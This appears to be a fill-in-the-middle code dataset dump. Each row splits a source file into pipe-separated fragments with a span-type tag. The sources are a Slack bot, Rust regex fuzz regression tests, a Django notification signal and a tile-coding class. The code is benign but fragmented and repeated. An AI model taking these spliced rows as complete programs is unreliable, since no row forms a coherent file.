msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch((e) => {
console.log(e)
msg.respond("Error adding source")
})
})
slapp.command('/feeds', 'sources', (msg, text) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return ncClient.listSources(feedId)
}).then(sources => {
var lines = sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') | else if (source.source.type == 'channel') {
| {
return `Search: "${source.source.keywords}"`
} | conditional_block |
regression_fuzz.rs | // These tests are only run for the "default" test target because some of them
// can take quite a long time. Some of them take long enough that it's not
// practical to run them in debug mode. :-/
// See: https://oss-fuzz.com/testcase-detail/5673225499181056
//
// Ignored by default since it takes too long in debug mode (almost a minute).
#[test]
#[ignore]
fn fuzz1() |
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26505
// See: https://github.com/rust-lang/regex/issues/722
#[test]
fn empty_any_errors_no_panic() {
assert!(regex_new!(r"\P{any}").is_err());
}
// This tests that a very large regex errors during compilation instead of
// using gratuitous amounts of memory. The specific problem is that the
// compiler wasn't accounting for the memory used by Unicode character classes
// correctly.
//
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33579
#[test]
fn big_regex_fails_to_compile() {
let pat = "[\u{0}\u{e}\u{2}\\w~~>[l\t\u{0}]p?<]{971158}";
assert!(regex_new!(pat).is_err());
}
| {
regex!(r"1}{55}{0}*{1}{55}{55}{5}*{1}{55}+{56}|;**");
} | identifier_body |
regression_fuzz.rs | // These tests are only run for the "default" test target because some of them
// can take quite a long time. Some of them take long enough that it's not
// practical to run them in debug mode. :-/ | #[test]
#[ignore]
fn fuzz1() {
regex!(r"1}{55}{0}*{1}{55}{55}{5}*{1}{55}+{56}|;**");
}
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26505
// See: https://github.com/rust-lang/regex/issues/722
#[test]
fn empty_any_errors_no_panic() {
assert!(regex_new!(r"\P{any}").is_err());
}
// This tests that a very large regex errors during compilation instead of
// using gratuitous amounts of memory. The specific problem is that the
// compiler wasn't accounting for the memory used by Unicode character classes
// correctly.
//
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33579
#[test]
fn big_regex_fails_to_compile() {
let pat = "[\u{0}\u{e}\u{2}\\w~~>[l\t\u{0}]p?<]{971158}";
assert!(regex_new!(pat).is_err());
} |
// See: https://oss-fuzz.com/testcase-detail/5673225499181056
//
// Ignored by default since it takes too long in debug mode (almost a minute). | random_line_split |
regression_fuzz.rs | // These tests are only run for the "default" test target because some of them
// can take quite a long time. Some of them take long enough that it's not
// practical to run them in debug mode. :-/
// See: https://oss-fuzz.com/testcase-detail/5673225499181056
//
// Ignored by default since it takes too long in debug mode (almost a minute).
#[test]
#[ignore]
fn | () {
regex!(r"1}{55}{0}*{1}{55}{55}{5}*{1}{55}+{56}|;**");
}
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26505
// See: https://github.com/rust-lang/regex/issues/722
#[test]
fn empty_any_errors_no_panic() {
assert!(regex_new!(r"\P{any}").is_err());
}
// This tests that a very large regex errors during compilation instead of
// using gratuitous amounts of memory. The specific problem is that the
// compiler wasn't accounting for the memory used by Unicode character classes
// correctly.
//
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33579
#[test]
fn big_regex_fails_to_compile() {
let pat = "[\u{0}\u{e}\u{2}\\w~~>[l\t\u{0}]p?<]{971158}";
assert!(regex_new!(pat).is_err());
}
| fuzz1 | identifier_name |
signals.py | """
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
| questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)
| if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None | identifier_body |
signals.py | """
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
|
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)
| if student_id == instructor.id:
return | conditional_block |
signals.py | """
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def | (sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)
| run_courselet_notif_flow | identifier_name |
signals.py | """
Django signals for the app.
"""
import logging | from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
) | random_line_split |
|
tile_coding.py | # -*- coding: utf8 -*-
from typing import List, Tuple
import numpy as np
from yarll.functionapproximation.function_approximator import FunctionApproximator
class | (FunctionApproximator):
"""Map states to tiles"""
def __init__(self, x_low, x_high, y_low, y_high, n_tilings: int, n_y_tiles: int, n_x_tiles: int, n_actions: int) -> None:
super(TileCoding, self).__init__(n_actions)
self.x_low = x_low
self.x_high = x_high
self.y_low = y_low
self.y_high = y_high
self.n_x_tiles = n_x_tiles
self.n_y_tiles = n_y_tiles
self.n_tilings = n_tilings
self.n_actions = n_actions
if self.n_x_tiles % 1 != 0 or self.n_x_tiles <= 0:
raise TypeError("Number of x tiles must be a positive natural number instead of {}".format(self.n_x_tiles))
if self.n_y_tiles % 1 != 0 or self.n_y_tiles <= 0:
raise TypeError("Number of y tiles must be a positive natural number instead of {}".format(self.n_y_tiles))
self.tile_width = (self.x_high - self.x_low) / self.n_x_tiles
self.tile_height = (self.y_high - self.y_low) / self.n_y_tiles
self.tiling_width = self.tile_width * self.n_x_tiles
self.tiling_height = self.tile_height * self.n_y_tiles
self.tile_starts: List[Tuple[float, float]] = []
# Each tiling starts at a random offset that is a fraction of the tile width and height
for _ in range(self.n_tilings):
self.tile_starts.append((
self.x_low + np.random.rand() * self.tile_width,
self.y_low + np.random.rand() * self.tile_height))
self.features_shape = (self.n_tilings, self.n_y_tiles, self.n_x_tiles, self.n_actions)
self.thetas = np.random.uniform(size=self.features_shape) # Initialise randomly with values between 0 and 1
def summed_thetas(self, state, action):
"""Theta values for features present for state and action."""
summed = 0
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i] # Subtract the randomly chosen offsets
x, y = shifted
if (x >= 0 and x <= self.tiling_width) and (y >= 0 and y <= self.tiling_height):
summed += self.thetas[i][int(y // self.tile_height)][int(x // self.tile_width)][action]
return summed
def present_features(self, state, action):
"""Features that are active for the given state and action."""
result = np.zeros(self.thetas.shape) # By default, all of them are inactve
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i]
x, y = shifted
if(x >= 0 and x <= self.tiling_width) and(y >= 0 and y <= self.tiling_height):
# Set the feature to active
result[i][int(y // self.tile_height)][int(x // self.tile_width)][action] = 1
return result
| TileCoding | identifier_name |
tile_coding.py | # -*- coding: utf8 -*-
from typing import List, Tuple
import numpy as np
from yarll.functionapproximation.function_approximator import FunctionApproximator
class TileCoding(FunctionApproximator):
"""Map states to tiles"""
def __init__(self, x_low, x_high, y_low, y_high, n_tilings: int, n_y_tiles: int, n_x_tiles: int, n_actions: int) -> None:
super(TileCoding, self).__init__(n_actions)
self.x_low = x_low
self.x_high = x_high
self.y_low = y_low
self.y_high = y_high
self.n_x_tiles = n_x_tiles
self.n_y_tiles = n_y_tiles
self.n_tilings = n_tilings
self.n_actions = n_actions
if self.n_x_tiles % 1 != 0 or self.n_x_tiles <= 0:
raise TypeError("Number of x tiles must be a positive natural number instead of {}".format(self.n_x_tiles))
if self.n_y_tiles % 1 != 0 or self.n_y_tiles <= 0:
raise TypeError("Number of y tiles must be a positive natural number instead of {}".format(self.n_y_tiles))
self.tile_width = (self.x_high - self.x_low) / self.n_x_tiles
self.tile_height = (self.y_high - self.y_low) / self.n_y_tiles
self.tiling_width = self.tile_width * self.n_x_tiles
self.tiling_height = self.tile_height * self.n_y_tiles
self.tile_starts: List[Tuple[float, float]] = []
# Each tiling starts at a random offset that is a fraction of the tile width and height
for _ in range(self.n_tilings):
|
self.features_shape = (self.n_tilings, self.n_y_tiles, self.n_x_tiles, self.n_actions)
self.thetas = np.random.uniform(size=self.features_shape) # Initialise randomly with values between 0 and 1
def summed_thetas(self, state, action):
"""Theta values for features present for state and action."""
summed = 0
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i] # Subtract the randomly chosen offsets
x, y = shifted
if (x >= 0 and x <= self.tiling_width) and (y >= 0 and y <= self.tiling_height):
summed += self.thetas[i][int(y // self.tile_height)][int(x // self.tile_width)][action]
return summed
def present_features(self, state, action):
"""Features that are active for the given state and action."""
result = np.zeros(self.thetas.shape) # By default, all of them are inactve
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i]
x, y = shifted
if(x >= 0 and x <= self.tiling_width) and(y >= 0 and y <= self.tiling_height):
# Set the feature to active
result[i][int(y // self.tile_height)][int(x // self.tile_width)][action] = 1
return result
| self.tile_starts.append((
self.x_low + np.random.rand() * self.tile_width,
self.y_low + np.random.rand() * self.tile_height)) | conditional_block |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.